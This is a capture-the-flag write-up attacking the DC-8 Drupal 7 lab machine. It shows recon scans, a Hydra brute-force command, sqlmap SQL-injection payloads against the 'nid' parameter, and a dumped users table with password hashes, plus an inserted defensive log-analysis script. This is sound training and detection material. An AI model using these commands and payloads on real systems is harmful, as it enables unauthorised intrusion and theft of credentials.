DC-8 - Vulnyx - Level: Medium - Report

Medium

Tools Used

nmap
nikto
gobuster
hydra
sqlmap
exim
wget

Reconnaissance

ARP Scan

192.168.2.164 08:00:27:a8:b6:73 PCS Systemtechnik GmbH

/etc/hosts

192.168.2.164 dc8.vln

The ARP scan shows the IP address and MAC address of the target system as well as the manufacturer of the network card. The entry in /etc/hosts allows the hostname `dc8.vln` to be used instead of the IP address, which simplifies the rest of the work.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-19 22:24 CEST
Nmap scan report for dc8.vln (192.168.2.164)
Host is up (0.00014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
| 256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_ 256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open http Apache httpd
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache
|_http-title: Welcome to DC-8 | DC-8
MAC Address: 08:00:27:A8:B6:73 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.14 ms dc8.vln (192.168.2.164)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.68 seconds

Nmap was used to identify open ports and running services on the target. Port 22 (SSH) and port 80 (HTTP) are open. The `http-generator: Drupal 7` header indicates a Drupal 7 installation.

Recommendation:

The Apache version is not disclosed in detail but should be kept up to date. The Drupal 7 installation should likewise be kept current; Drupal 7 has reached end-of-life and no longer receives security updates.

Web Enumeration

- Nikto v2.5.0

+ Target IP: 192.168.2.164
+ Target Hostname: 192.168.2.164
+ Target Port: 80
+ Start Time: 2024-10-19 22:25:03 (GMT+0200)

+ Server: Apache
+ /: Drupal 7 was identified via the x-generator header. See: https://www.drupal.org/project/remove_http_headers
+ /: Drupal Link header found with value: ; rel="canonical",; rel="shortlink". See: https://www.drupal.org/
+ /dlvRKovp.php#: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Entry '/UPGRADE.txt' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/?q=filter/tips/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/INSTALL.sqlite.txt' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/install.php' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/?q=user/password/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/xmlrpc.php' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/user/password/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/LICENSE.txt' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/MAINTAINERS.txt' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/user/login/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/INSTALL.mysql.txt' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/filter/tips/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/?q=user/login/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/INSTALL.pgsql.txt' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 68 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ /: A database error may reveal internal details about the running database.
+ /web.config: ASP config file is accessible.
+ /user/: This might be interesting.
+ /UPGRADE.txt: Default file found.
+ /install.php: Drupal install.php file found. See: https://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-file
+ /install.php: install.php file found.
+ /LICENSE.txt: License file found may identify site software.
+ /xmlrpc.php: xmlrpc.php was found.
+ /INSTALL.mysql.txt: Drupal installation file found. See: https://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-file
+ /INSTALL.pgsql.txt: Drupal installation file found. See: https://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-file
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8978 requests: 0 error(s) and 31 item(s) reported on remote host
+ End Time: 2024-10-19 22:26:57 (GMT+0200) (114 seconds)

+ 1 host(s) tested

Nikto scanned the target for known weaknesses and confirmed the Drupal 7 installation. Several files were found that may disclose information about the system, including `robots.txt`, `web.config`, `INSTALL.txt`, `LICENSE.txt`, `xmlrpc.php` and `icons/README`.

Recommendation:

The files found should be reviewed manually for further information about the system. The Drupal installation should be kept up to date, and since Drupal 7 has reached end-of-life, an upgrade to a newer version should be considered.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt....
http://192.168.2.164/index.php (Status: 200) [Size: 7948]
http://192.168.2.164/rss.xml (Status: 200) [Size: 274]
http://192.168.2.164/misc (Status: 301) [Size: 234] [--> http://192.168.2.164/misc/]
http://192.168.2.164/0 (Status: 200) [Size: 7948]
http://192.168.2.164/user (Status: 200) [Size: 8518]
http://192.168.2.164/themes (Status: 301) [Size: 236] [--> http://192.168.2.164/themes/]
http://192.168.2.164/modules (Status: 301) [Size: 237] [--> http://192.168.2.164/modules/]
http://192.168.2.164/web.config (Status: 200) [Size: 2200]
http://192.168.2.164/scripts (Status: 301) [Size: 237] [--> http://192.168.2.164/scripts/]
http://192.168.2.164/node (Status: 200) [Size: 7203]
http://192.168.2.164/sites (Status: 301) [Size: 235] [--> http://192.168.2.164/sites/]
http://192.168.2.164/includes (Status: 301) [Size: 238] [--> http://192.168.2.164/includes/]
http://192.168.2.164/install.php (Status: 200) [Size: 3326]
http://192.168.2.164/profiles (Status: 301) [Size: 238] [--> http://192.168.2.164/profiles/]
http://192.168.2.164/README.txt (Status: 200) [Size: 5382]
http://192.168.2.164/RSS.xml (Status: 200) [Size: 274]
http://192.168.2.164/robots.txt (Status: 200) [Size: 2189]
http://192.168.2.164/INSTALL.txt (Status: 200) [Size: 17995]
http://192.168.2.164/LICENSE.txt (Status: 200) [Size: 18092]
http://192.168.2.164/Rss.xml (Status: 200) [Size: 274]

Gobuster was used to find hidden files and directories on the web server. The results confirm the Drupal 7 installation and reveal more about the structure of the site.

User-agent: *
Crawl-delay: 10
# CSS, JS, Images
Allow: /misc/*.css$
Allow: /misc/*.css?
Allow: /misc/*.js$
Allow: /misc/*.js?
Allow: /misc/*.gif
Allow: /misc/*.jpg
Allow: /misc/*.jpeg
Allow: /misc/*.png
Allow: /modules/*.css$
Allow: /modules/*.css?
Allow: /modules/*.js$
Allow: /modules/*.js?
Allow: /modules/*.gif
Allow: /modules/*.jpg
Allow: /modules/*.jpeg
Allow: /modules/*.png
Allow: /profiles/*.css$
Allow: /profiles/*.css?
Allow: /profiles/*.js$
Allow: /profiles/*.js?
Allow: /profiles/*.gif
Allow: /profiles/*.jpg
Allow: /profiles/*.jpeg
Allow: /profiles/*.png
Allow: /themes/*.css$
Allow: /themes/*.css?
Allow: /themes/*.js$
Allow: /themes/*.js?
Allow: /themes/*.gif
Allow: /themes/*.jpg
Allow: /themes/*.jpeg
Allow: /themes/*.png
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

The `robots.txt` file lists directories and files that search-engine crawlers should not index. It can be useful for identifying sensitive areas of the site.

Recommendation:

The entries in `robots.txt` should be reviewed to ensure that no sensitive areas are inadvertently disclosed.

Access denied
You are not authorized to access this page.
Powered by Drupal

The administration panel cannot be accessed without logging in.

Initial Access

┌──(root㉿CCat)-[~]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.2.164 http-post-form "/user:name=^USER^&pass=^PASS^&form_build_id=form-Broa-Shi-FEMzeXe7Kr4YS7e4noJ1SoWhHZnCNf75I&form_id=user_login&op=Log+in:Sorry, unrecognized username or password." -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these * ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-19 22:47:41
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344492 login tries (l:1/p:14344492), ~224133 tries per task
[DATA] attacking http-post-form://192.168.2.164:80/user:name=^USER^&pass=^PASS^&form_build_id=form-Broa-Shi-FEMzeXe7Kr4YS7e4noJ1SoWhHZnCNf75I&form_id=user_login&op=Log+in:Sorry, unrecognized username or password.
[80][http-post-form] host: 192.168.2.164 login: admin password: rockyou
[80][http-post-form] host: 192.168.2.164 login: admin password: z9hG4bK27a80d11
[80][http-post-form] host: 192.168.2.164 login: admin password: 123456
[80][http-post-form] host: 192.168.2.164 login: admin password: hostinger
[80][http-post-form] host: 192.168.2.164 login: admin password: 12345
[80][http-post-form] host: 192.168.2.164 login: admin password: princess
[80][http-post-form] host: 192.168.2.164 login: admin password: daniel

Hydra was used to run a brute-force attack against the Drupal login form. Various passwords from the rockyou wordlist were tried, but none was successful; the candidates Hydra reported are false positives. The `http-post-form` module was used to specify the login form parameters, and the error message "Sorry, unrecognized username or password." served as the failure string for identifying invalid attempts.

Analysis:

The brute-force attack did not succeed, which suggests that the user `admin` may not exist or uses a strong password. It is also possible that the Drupal installation has safeguards against brute-force attacks: Drupal 7's flood control temporarily blocks an account after repeated failed logins and answers with a different error message, which is also why Hydra reported several candidates as hits although none of them works.

Recommendation:

Further techniques for identifying valid usernames and passwords should be applied, and it should be checked whether the Drupal installation is susceptible to account enumeration.

┌──(root㉿CCat)-[~]
└─# cat /home/ccat/Downloads/sql.sql
POST /?nid=1 HTTP/1.1
Host: 192.168.2.164
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Origin: http://192.168.2.164
DNT: 1
Connection: keep-alive
Referer: http://192.168.2.164/user
Cookie: has_js=1
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

name=admin&pass=admin11111&form_build_id=form-Broa-Shi-FEMzeXe7Kr4YS7e4noJ1SoWhHZnCNf75I&form_id=user_login&op=Log+in

The file `/home/ccat/Downloads/sql.sql` contains a captured HTTP request that serves as input for SQL-injection testing. The request attempts a login with the username `admin` and the password `admin11111`; the `nid` parameter in the request line is the part sqlmap ends up testing.

┌──(root㉿CCat)-[~]
└─# sqlmap -r /home/ccat/Downloads/sql.sql --dbs --batch --dump --level=5 --risk=3 --random-agent --dbms=mysql
___
__H__
___ ___[,]_____ ___ ___ {1.8.9#stable}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:57:14 /2024-10-19/

[23:04:35] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.1
[23:04:35] [INFO] fetching database names
[23:04:35] [WARNING] the SQL query provided does not return any output
[23:04:35] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[23:04:35] [INFO] fetching number of databases
[23:04:35] [INFO] retrieved:
[23:04:35] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[23:04:35] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 24449 HTTP(s) requests:

Parameter: nid (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: nid=(UPDATEXML(4222,CONCAT(0x2e,0x716a7a7871,(SELECT (ELT(4222=4222,1))),0x7176626a71),1091))

Type: time-based blind
Title: MySQL time-based blind - Parameter replace (ELT)
Payload: nid=ELT(5514=5514,SLEEP(5))

[23:04:35] [ERROR] unable to retrieve the number of databases
[23:04:35] [INFO] falling back to current database
[23:04:35] [INFO] fetching current database
[23:04:35] [INFO] retrieved:
[23:04:35] [CRITICAL] unable to retrieve the database names
[23:04:35] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[23:04:35] [INFO] fetching current database
[23:04:35] [INFO] resumed: ''
[23:04:35] [INFO] fetching tables for database: ''
[23:04:35] [WARNING] the SQL query provided does not return any output
[23:04:35] [WARNING] the SQL query provided does not return any output
[23:04:35] [INFO] fetching number of tables for database ''
[23:04:35] [INFO] retrieved:
[23:04:35] [WARNING] unable to retrieve the number of tables for database ''
[23:04:35] [INFO] fetching number of tables for database ''
[23:04:35] [INFO] retrieved:
[23:04:35] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
[23:04:35] [CRITICAL] unable to retrieve the tables in database ''
[23:04:35] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2825 times
[23:04:35] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.2.164'

[*] ending @ 23:04:35 /2024-10-19/

http://192.168.2.164/?nid=ELT(5514=5514,SLEEP(5))

No visible output.

sqlmap was used to test the target for SQL-injection vulnerabilities. The results show that an injection exists in the `nid` parameter, but permission problems or other restrictions prevented this run from retrieving database or table names. The many HTTP 500 errors point to problems on the target, consistent with each error-based payload provoking an unhandled database error.
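Seen from the server side, both the Hydra run against `/user` and the sqlmap run against `?nid=` leave a recognisable footprint in the Apache access log. The script below is an added example, not part of the original write-up: it parses combined-format log lines and flags clients that send SQL functions in the query string, pile up HTTP 5xx responses (the trace of error-based payloads) or hammer the login form. The log lines, the client address 192.168.2.99, the user-agent strings and the thresholds are constructed for the demonstration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Apache "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# SQL functions that appeared in the sqlmap payloads against ?nid= (UPDATEXML,
# CONCAT, ELT, SLEEP) plus a few common relatives, each followed by '('.
SQLI_RE = re.compile(
    r'\b(UPDATEXML|EXTRACTVALUE|CONCAT|ELT|SLEEP|BENCHMARK|SELECT|UNION)\s*\(',
    re.IGNORECASE,
)

LOGIN_PATH = '/user'   # Drupal 7 login form that Hydra posted to


def parse_line(line: str):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip('\n'))
    return m.groupdict() if m else None


def analyse(lines, sqli_min=2, error_min=2, login_min=3):
    """Aggregate per-client indicators and return the clients with findings.

    Thresholds are deliberately low for the small constructed sample; in
    production tune them per site and evaluate them over a time window.
    """
    per_ip = defaultdict(Counter)
    for line in lines:
        r = parse_line(line)
        if r is None:
            continue
        c = per_ip[r['ip']]
        c['requests'] += 1
        path = unquote(r['path'])                # decode %20 etc. before matching
        if SQLI_RE.search(path):
            c['sqli_payloads'] += 1
        if r['status'].startswith('5'):          # error-based probing leaves 500s behind
            c['server_errors'] += 1
        if r['method'] == 'POST' and path.split('?', 1)[0] == LOGIN_PATH:
            c['login_posts'] += 1
        # Weak evidence only: sqlmap's --random-agent (used in the first run) hides this.
        if 'sqlmap' in r['ua'].lower():
            c['sqlmap_ua'] += 1

    findings = {}
    for ip, c in per_ip.items():
        reasons = []
        if c['sqli_payloads'] >= sqli_min:
            reasons.append(f"{c['sqli_payloads']} requests with SQL functions in the query string")
        if c['server_errors'] >= error_min:
            reasons.append(f"{c['server_errors']} HTTP 5xx responses")
        if c['login_posts'] >= login_min:
            reasons.append(f"{c['login_posts']} POSTs to {LOGIN_PATH} (credential guessing)")
        if c['sqlmap_ua']:
            reasons.append('sqlmap User-Agent')
        if reasons:
            findings[ip] = {'counts': dict(c), 'reasons': reasons}
    return findings


# Constructed sample: one ordinary visitor and one client (192.168.2.99, a made-up
# address) replaying the kinds of requests Hydra and sqlmap sent in this write-up.
SAMPLE_LOG = """\
192.168.2.20 - - [19/Oct/2024:22:30:01 +0200] "GET /?nid=2 HTTP/1.1" 200 7203 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.2.99 - - [19/Oct/2024:22:47:41 +0200] "POST /user HTTP/1.1" 200 8518 "-" "Mozilla/5.0 (constructed-hydra-ua)"
192.168.2.99 - - [19/Oct/2024:22:47:41 +0200] "POST /user HTTP/1.1" 200 8518 "-" "Mozilla/5.0 (constructed-hydra-ua)"
192.168.2.99 - - [19/Oct/2024:22:47:42 +0200] "POST /user HTTP/1.1" 200 8518 "-" "Mozilla/5.0 (constructed-hydra-ua)"
192.168.2.99 - - [19/Oct/2024:22:47:42 +0200] "POST /user HTTP/1.1" 200 8518 "-" "Mozilla/5.0 (constructed-hydra-ua)"
192.168.2.99 - - [19/Oct/2024:23:04:30 +0200] "GET /?nid=ELT(5514=5514,SLEEP(5)) HTTP/1.1" 200 7203 "-" "sqlmap/1.8.9#stable (https://sqlmap.org)"
192.168.2.99 - - [19/Oct/2024:23:04:31 +0200] "GET /?nid=(UPDATEXML(4222,CONCAT(0x2e,0x716a7a7871,(SELECT%20(ELT(4222=4222,1))),0x7176626a71),1091)) HTTP/1.1" 500 1260 "-" "sqlmap/1.8.9#stable (https://sqlmap.org)"
192.168.2.99 - - [19/Oct/2024:23:04:32 +0200] "GET /?nid=(UPDATEXML(4222,CONCAT(0x2e,0x716a7a7871,(SELECT%20(ELT(4222=4222,2))),0x7176626a71),1091)) HTTP/1.1" 500 1260 "-" "sqlmap/1.8.9#stable (https://sqlmap.org)"
"""

if __name__ == '__main__':
    for ip, f in analyse(SAMPLE_LOG.splitlines()).items():
        print(ip)
        for reason in f['reasons']:
            print('  -', reason)
```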

┌──(root㉿CCat)-[~]
└─# sqlmap -u http://192.168.2.164/?nid=2 --dbs --batch --level=5 --risk=3 --dbms=mysql

[*] starting @ 23:06:24 /2024-10-19/

[23:06:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: nid (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: nid=(UPDATEXML(4222,CONCAT(0x2e,0x716a7a7871,(SELECT (ELT(4222=4222,1))),0x7176626a71),1091))

Type: time-based blind
Title: MySQL time-based blind - Parameter replace (ELT)
Payload: nid=ELT(5514=5514,SLEEP(5))

[23:06:24] [INFO] testing MySQL
[23:06:24] [WARNING] reflective value(s) found and filtering out
[23:06:24] [INFO] confirming MySQL
[23:06:24] [WARNING] potential permission problems detected ('command denied')
[23:06:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[23:06:24] [INFO] fetching database names
[23:06:24] [INFO] retrieved: 'd7db'
[23:06:25] [INFO] retrieved: 'information_schema'
available databases [2]:
[*] d7db
[*] information_schema

[23:06:25] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 7 times
[23:06:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.2.164'

sqlmap was run again, this time directly against the URL. The database names `d7db` and `information_schema` were retrieved successfully.

┌──(root㉿CCat)-[~]
└─# sqlmap -u http://192.168.2.164/?nid=2 -D d7db --tables --batch --level=5 --risk=3 --dbms=mysql

[*] starting @ 23:07:07 /2024-10-19/

[23:07:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: nid (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: nid=(UPDATEXML(4222,CONCAT(0x2e,0x716a7a7871,(SELECT (ELT(4222=4222,1))),0x7176626a71),1091))

Type: time-based blind
Title: MySQL time-based blind - Parameter replace (ELT)
Payload: nid=ELT(5514=5514,SLEEP(5))

[23:07:07] [INFO] testing MySQL
[23:07:07] [INFO] confirming MySQL
[23:07:07] [WARNING] reflective value(s) found and filtering out
[23:07:07] [WARNING] potential permission problems detected ('command denied')
[23:07:07] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[23:07:07] [INFO] fetching tables for database: 'd7db'
Database: d7db
[88 tables]
+--+
| block |
| cache |
| filter |
| history |
| role |
| system |
| actions |
| authmap |
| batch |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_views |
| cache_views_data |
| ckeditor_input_format |
| ckeditor_settings |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter_format |
| flood |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| site_messages_table |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
| webform |
| webform_component |
| webform_conditional |
| webform_conditional_actions |
| webform_conditional_rules |
| webform_emails |
| webform_last_download |
| webform_roles |
| webform_submissions |
| webform_submitted_data |
+--+

[23:07:09] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 97 times
[23:07:09] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.2.164'

sqlmap was used to list the tables in the `d7db` database. Numerous tables were found, which reflects the complexity of the Drupal installation; among them is `users`.

┌──(root㉿CCat)-[~]
└─# sqlmap -u http://192.168.2.164/?nid=2 -D d7db -T users --dump --batch --level=5 --risk=3 --dbms=mysql

[*] starting @ 23:07:40 /2024-10-19/

[23:07:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: nid (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: nid=(UPDATEXML(4222,CONCAT(0x2e,0x716a7a7871,(SELECT (ELT(4222=4222,1))),0x7176626a71),1091))

Type: time-based blind
Title: MySQL time-based blind - Parameter replace (ELT)
Payload: nid=ELT(5514=5514,SLEEP(5))

[23:07:40] [INFO] testing MySQL
[23:07:40] [INFO] confirming MySQL
[23:07:41] [WARNING] reflective value(s) found and filtering out
[23:07:41] [WARNING] potential permission problems detected ('command denied')
[23:07:41] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[23:07:41] [INFO] fetching columns for table 'users' in database 'd7db'
[23:07:41] [INFO] retrieved: 'uid'
[23:07:41] [INFO] retrieved: 'int(10) unsigned'
[23:07:41] [INFO] retrieved: 'name'
[23:07:41] [INFO] retrieved: 'varchar(60)'
[23:07:41] [INFO] retrieved: 'pass'
[23:07:41] [INFO] retrieved: 'varchar(128)'
[23:07:41] [INFO] retrieved: 'mail'
[23:07:41] [INFO] retrieved: 'varchar(254)'
[23:07:41] [INFO] retrieved: 'theme'
[23:07:41] [INFO] retrieved: 'varchar(255)'
[23:07:41] [INFO] retrieved: 'signature'
[23:07:41] [INFO] retrieved: 'varchar(255)'
[23:07:41] [INFO] retrieved: 'signature_format'
[23:07:41] [INFO] retrieved: 'varchar(255)'
[23:07:41] [INFO] retrieved: 'created'
[23:07:41] [INFO] retrieved: 'int(11)'
[23:07:41] [INFO] retrieved: 'access'
[23:07:41] [INFO] retrieved: 'int(11)'
[23:07:41] [INFO] retrieved: 'login'
[23:07:41] [INFO] retrieved: 'int(11)'
[23:07:41] [INFO] retrieved: 'status'
[23:07:41] [INFO] retrieved: 'tinyint(4)'
[23:07:41] [INFO] retrieved: 'timezone'
[23:07:41] [INFO] retrieved: 'varchar(32)'
[23:07:41] [INFO] retrieved: 'language'
[23:07:41] [INFO] retrieved: 'varchar(12)'
[23:07:41] [INFO] retrieved: 'picture'
[23:07:41] [INFO] retrieved: 'int(11)'
[23:07:41] [INFO] retrieved: 'init'
[23:07:41] [INFO] retrieved: 'varchar(254)'
[23:07:41] [INFO] retrieved: 'data'
[23:07:41] [INFO] retrieved: 'longblob'
[23:07:41] [INFO] fetching entries for table 'users' in database 'd7db'
Database: d7db
Table: users
[3 entries]
+--++--++++--+++++-+--+--+++
| uid | init | mail | pass | login | theme | data | name | access | created | picture | status | timezone | signature | language | signature_format |
+--++--++++--+++++-+--+--+++
| 0 | | | | 0 | | NULL | | 0 | 0 | 0 | 0 | NULL | | | NULL |
| 1 | dc8blah@dc8blah.org | dcau-user@outlook.com | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z | 1567766626 | | a:2:{s:7:"contact";i:0;s:7:"overlay";i:1;} | admin | 1567766818 | 1567489015 | 0 | 1 | Australia/Brisbane | | | filtered_html |
| 2 | john@blahsdfsfd.org | john@blahsdfsfd.org | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF | 1567497783 | | a:5:{s:16:"ckeditor_default";s:1:"t";s:20:"ckeditor_show_toggle";s:1:"t";s:14:"ckeditor_width";s:4:"100%";s:13:"ckeditor_lang";s:2:"en";s:18:"ckeditor_auto_lang";s:1:"t";} | john | 1567498512 | 1567489250 | 0 | 1 | Australia/Brisbane | | | filtered_html |
+--++--++++--+++++-+--+--+++

[23:07:42] [INF] table 'd7db.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.2.164/dump/d7db/users.csv'
[23:07:42] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 95 times
[23:07:42] [INF] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.2.164'

SQLmap was used to dump the `users` table from the `d7db` database. The columns and their associated data were extracted successfully. The password hashes of the users `admin` and `john` were found.

Analysis:

The extracted password hashes use the Drupal 7 hash format, which is considered relatively weak. It is likely that these passwords can be cracked with a suitable tool.

Recommendation:

